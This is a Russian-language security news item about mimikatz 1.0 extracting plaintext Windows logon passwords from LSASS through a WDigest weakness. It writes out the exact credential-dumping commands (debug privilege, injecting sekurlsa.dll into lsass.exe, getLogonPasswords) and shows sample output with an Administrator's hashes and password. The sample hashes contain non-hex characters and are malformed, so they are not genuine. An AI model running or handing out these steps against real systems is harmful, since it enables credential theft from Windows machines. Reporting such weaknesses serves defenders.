Обнаружена опасная уязвимость в Microsoft Windows

Обнаружена опасная уязвимость в Microsoft Windows

Локальный пользователь может получить доступ к потенциально важным данным.

Исследователь Benjamin "gentilkiwi" ("хороший киви") недавно опубликовал в своем блоге новую версию утилиты mimikatz 1.0, предназначенной для работы с учетными данными на ОС Windows. В новой версии, помимо функционала, аналогичного Windows Credentials Editor, был реализован функционал получения пароля пользователя в открытом виде.

Брешь, используемая mimikatz, связана с реализацией WDigest.dll, предназначенной для дайджест-аутентификации. Особенности реализации механизма HTTP Digest Authentication для поддержки SSO (Single Sign On) требуют знание вводимого пароля, а не только его хеша. Поэтому, разработчики Windows решили хранить пароли пользователей в открытом виде.

Чтобы просмотреть список паролей авторизованных пользователей на системе необходимо выполнить следующие команды:

mimikatz # privilege::debug
mimikatz # inject::process lsass.exe sekurlsa.dll
mimikatz # @getLogonPasswords

Вывод будет примерно следующим:

mimikatz # privilege::debug
  Demande d'ACTIVATION du privilege : SeDebugPrivilege : OK
  
  mimikatz # inject::process lsass.exe sekurlsa.dll
  PROCESSENTRY32(lsass.exe).th32ProcessID = 680
  Attente de connexion du client...
  Serveur connecte a un client !
  Message du processus :
  Bienvenue dans un processus distant
                          Gentil Kiwi
  
  SekurLSA : librairie de manipulation des donnees de securites dans LSASS
  
  mimikatz # @getLogonPasswords
  
  Authentification Id         : 0;248844
  Package d'authentification  : NTLM
  Utilisateur principal       : ANONYMOUS LOGON
  Domaine d'authentification  : NT AUTHORITY
          msv1_0 :        n.t. (LUID KO)
          wdigest :       n.t. (LUID KO)
          tspkg :         n.t. (LUID KO)
  
  Authentification Id         : 0;996
  Package d'authentification  : Negotiate
  Utilisateur principal       : PC01$
  Domaine d'authentification  : WORKGROUP
          msv1_0 :        n.t. (LUID KO)
          wdigest :
          tspkg :         n.t. (LUID KO)
  
  Authentification Id         : 0;575543
  Package d'authentification  : NTLM
  Utilisateur principal       : Administrator
  Domaine d'authentification  : PC01
          msv1_0 :        lm{ 336dcb9831c8a03dka9872550c3cee6 }, ntlm{ 76af46e798f45ceb87805ba95380b39ed }
          wdigest :       password
          tspkg :         password
  
  Authentification Id         : 0;997
  Package d'authentification  : Negotiate
  Utilisateur principal       : LOCAL SERVICE
  Domaine d'authentification  : NT AUTHORITY
          msv1_0 :        n.t. (LUID KO)
          wdigest :
          tspkg :         n.t. (LUID KO)
  
  Authentification Id         : 0;62105
  Package d'authentification  : NTLM
  Utilisateur principal       :
  Domaine d'authentification  :
          msv1_0 :        n.t. (LUID KO)
          wdigest :       n.t. (LUID KO)
          tspkg :         n.t. (LUID KO)
  
  Authentification Id         : 0;999
  Package d'authentification  : NTLM
  Utilisateur principal       : PC01$
  Domaine d'authentification  : WORKGROUP
          msv1_0 :        n.t. (LUID KO)
          wdigest :
          tspkg :         n.t. (LUID KO)
  mimikatz #
  

Функционал mimikatz в настоящий момент внедряется в Metasploit Framework, и может быть взят на вооружение многими исследователями безопасности.

Скачать утилиту можно по адресу: http://blog.gentilkiwi.com/mimikatz

Описание уязвимости доступно по адресу: http://www.securitylab.ru/vulnerability/420418.php

Тени в интернете всегда следят за вами

Станьте невидимкой – подключайтесь к нашему каналу.